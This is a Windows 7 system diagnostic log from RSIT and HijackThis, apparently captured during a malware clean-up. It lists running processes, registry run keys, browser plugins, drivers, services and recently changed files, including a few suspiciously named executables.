"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E7BF32E2BCC4F6399669CCB8E54A04CC --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E7BF32E2BCC4F6399669CCB8E54A04CC --renderer-client-id=4 --mojo-platform-channel-handle=2592 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=960523435D3F887DE832A4404842A18B --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=960523435D3F887DE832A4404842A18B --renderer-client-id=14 --mojo-platform-channel-handle=3420 /prefetch:1
C:\Windows\system32\CompatTelRunner.exe
\??\C:\Windows\system32\conhost.exe "1512110160697033495-800213516-119467602-1064192088154836462811149822782145537507
C:\Windows\system32\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:PxDcTOQ9t0aEou5p.1
taskeng.exe {7912F5E3-0345-4546-8687-238EFA0866D6}
C:\Windows\system32\wbem\wmiprvse.exe
taskeng.exe {C5AD0D9E-7183-4887-A14D-6F6A8D5A8D06}
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=C9E947F72D9B35D51EF245BAC507C30B --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=C9E947F72D9B35D51EF245BAC507C30B --renderer-client-id=35 --mojo-platform-channel-handle=4220 /prefetch:1
C:\Windows\system32\wbem\wmiprvse.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 512 516 524 65536 520
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E1A56BA9015DD51AE87C7EB2DE2A1EEC --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E1A56BA9015DD51AE87C7EB2DE2A1EEC --renderer-client-id=36 --mojo-platform-channel-handle=4004 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E8075E17D62A768FD9A6E2B5DC1ABF7D --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E8075E17D62A768FD9A6E2B5DC1ABF7D --renderer-client-id=38 --mojo-platform-channel-handle=4060 /prefetch:1
"C:\Users\Drone\Downloads\RSITx64 (1).exe"
=========Mozilla firefox=========
ProfilePath - C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283
prefs.js - "browser.search.useDBForOrder" - true
"support@vdownloader.com"=C:\Program Files\VDownloader\Addons\FireFox
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]
"Description"=Picasa3 plugin
"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.172.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.172.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
C:\Program Files (x86)\Mozilla Firefox\plugins\
nppdf32.dll
C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283\extensions\
cs@dictionaries.addons.mozilla.org
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\ssv.dll [2018-04-25 582088]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-05-24 958328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\jp2ssv.dll [2018-04-25 245192]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7b523e7c-f096-4e36-a0cb-7efeb5c675c1}]
IEExtension.VDownloaderBHO - C:\Windows\system32\mscoree.dll [2010-11-21 444752]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-05-24 820672]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-05-24 242904]
[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"=C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [2013-10-08 766208]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2018-03-28 588704]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\prwntdrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\prwntdrv]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"SoftwareSASGeneration"=1
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoSimpleNetIDList"=1
"NoDriveTypeAutoRun"=221
"NoDrives"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"vidc.mjpg"=bdmjpeg64.dll
"vidc.mpeg"=bdmpegv64.dll
"msacm.bdmpeg"=bdmpega64.acm
"VIDC.FPS1"=frapsv64.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
======List of files/folders created in the last 1 month======
2018-09-04 20:51:41 ----A---- C:\Windows\ntbtlog.txt
2018-09-04 20:33:45 ----D---- C:\AdwCleaner
2018-09-04 17:05:14 ----D---- C:\rsit
2018-09-03 14:19:18 ----D---- C:\Windows\{EB47D3E9-14CE-4BE0-B16B-C061571F46C7}
2018-09-02 16:15:31 ----D---- C:\9df5ec6646e5f65a782b5ad04331
2018-09-02 11:10:32 ----D---- C:\Windows\{D32F0790-E651-41F4-9571-6065DA044B85}
2018-09-01 20:53:51 ----D---- C:\Program Files\VS Revo Group
2018-09-01 20:28:40 ----N---- C:\Windows\SYSWOW64\mfc71.dll
2018-08-29 15:10:58 ----D---- C:\Windows\{B58AFBDA-7D5B-40C0-BE79-D9F3286E2165}
2018-08-25 09:52:05 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-22 18:51:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-14 21:52:56 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-10 14:47:32 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-07 13:48:33 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
======List of files/folders modified in the last 1 month======
2018-09-05 16:07:19 ----D---- C:\Program Files\trend micro
2018-09-05 16:07:11 ----D---- C:\Windows\Temp
2018-09-05 15:55:06 ----D---- C:\Windows\SysWOW64
2018-09-05 15:53:13 ----SHD---- C:\Windows\Installer
2018-09-05 15:52:57 ----SHD---- C:\Config.Msi
2018-09-04 20:51:41 ----D---- C:\Windows
2018-09-04 16:26:00 ----D---- C:\Users\Drone\AppData\Roaming\MPC-HC
2018-09-04 14:00:23 ----D---- C:\Windows\system32\LogFiles
2018-09-04 13:57:19 ----D---- C:\Windows\Prefetch
2018-09-03 22:07:02 ----D---- C:\Users\Drone\AppData\Roaming\PhotoScape
2018-09-03 20:28:28 ----D---- C:\Windows\rescache
2018-09-03 17:08:24 ----D---- C:\Windows\SYSWOW64\Macromed
2018-09-02 20:42:57 ----D---- C:\Windows\inf
2018-09-02 20:42:54 ----D---- C:\Windows\Minidump
2018-09-02 19:39:45 ----D---- C:\Windows\system32\config
2018-09-02 19:38:34 ----D---- C:\Windows\winsxs
2018-09-02 19:32:55 ----D---- C:\Windows\system32\catroot2
2018-09-02 19:09:26 ----D---- C:\Windows\System32
2018-09-02 19:09:26 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-09-02 19:01:32 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-09-02 19:01:32 ----D---- C:\Program Files\Internet Explorer
2018-09-02 19:01:31 ----D---- C:\Windows\SYSWOW64\en-US
2018-09-02 19:01:30 ----D---- C:\Windows\system32\drivers
2018-09-02 19:01:30 ----D---- C:\Windows\system32\cs-CZ
2018-09-02 19:01:29 ----D---- C:\Windows\system32\en-US
2018-09-02 19:01:27 ----D---- C:\Windows\AppPatch
2018-09-02 19:01:27 ----D---- C:\Program Files (x86)\Internet Explorer
2018-09-02 19:01:26 ----D---- C:\Windows\system32\Boot
2018-09-02 19:01:22 ----D---- C:\Windows\system32\DriverStore
2018-09-02 18:25:57 ----D---- C:\Windows\system32\CodeIntegrity
2018-09-01 21:44:27 ----RD---- C:\Program Files (x86)
2018-09-01 21:02:13 ----D---- C:\Users\Drone\AppData\Roaming\uTorrent
2018-09-01 21:02:12 ----D---- C:\Users\Drone\AppData\Roaming\Seznam.cz
2018-09-01 20:53:51 ----D---- C:\Program Files
2018-08-28 15:08:59 ----SD---- C:\ProgramData\Microsoft
2018-08-26 15:08:15 ----D---- C:\Users\Drone\AppData\Roaming\vlc
2018-08-23 14:22:53 ----D---- C:\Windows\system32\Tasks
2018-08-14 21:51:03 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2018-08-14 21:50:54 ----D---- C:\Windows\system32\Macromed
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Firefox
2018-08-11 14:57:07 ----D---- C:\Program Files (x86)\Common Files
2018-08-10 21:58:02 ----RSD---- C:\Windows\assembly
2018-08-06 22:57:04 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-05-24 199440]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-05-24 343752]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-05-24 57680]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-05-24 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-05-24 381552]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2018-01-01 213736]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-05-24 196640]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-05-24 227504]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-05-24 234560]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-05-24 111360]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-05-24 1027720]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-05-24 460520]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2012-01-12 514560]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-05-24 159120]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-05-24 205976]
R2 npf;NetGroup Packet Filter Driver; C:\Windows\system32\drivers\npf.sys [2011-02-11 35344]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-10-08 12534784]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-10-08 619008]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2016-04-01 104976]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2009-03-01 187392]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-05-24 46968]
S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2012-01-12 95232]
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 prwntdrv;prwntdrv; \??\C:\Windows\syswow64\prwntdrv.sys [2014-10-23 15456]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2012-01-12 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2018-03-21 83984]
R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-10-08 239616]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-05-24 317280]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-05-24 7620096]
S2 avast;Služba %1!s! Update (avast); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2017-04-21 107656]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2017-04-21 128648]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-08-14 335872]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2012-01-12 27648]
S3 avastm;Služba %1!s! Update (avastm); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2015-02-13 136120]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2017-12-29 116224]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2018-08-11 194512]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-30 1255736]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2017-04-21 52856]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
-----------------EOF-----------------
Logfile of random's system information tool 1.10 (written by random/random)
Run by Drone at 2018-09-05 16:07:12
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 47 GB (20%) free of 238 GB
Total RAM: 4094 MB (57% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 16:07:24, on 5.9.2018
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18894)
Boot mode: Normal
Running processes:
C:\Windows\SysWOW64\EhYeIeLWi.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Windows\syswow64\MsiExec.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files\trend micro\Drone.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkI ... id=UE12DHP
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: IEExtension.VDownloaderBHO - {7b523e7c-f096-4e36-a0cb-7efeb5c675c1} - mscoree.dll (file missing)
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Služba %1!s! Update (avast) (avast) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Služba %1!s! Update (avastm) (avastm) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
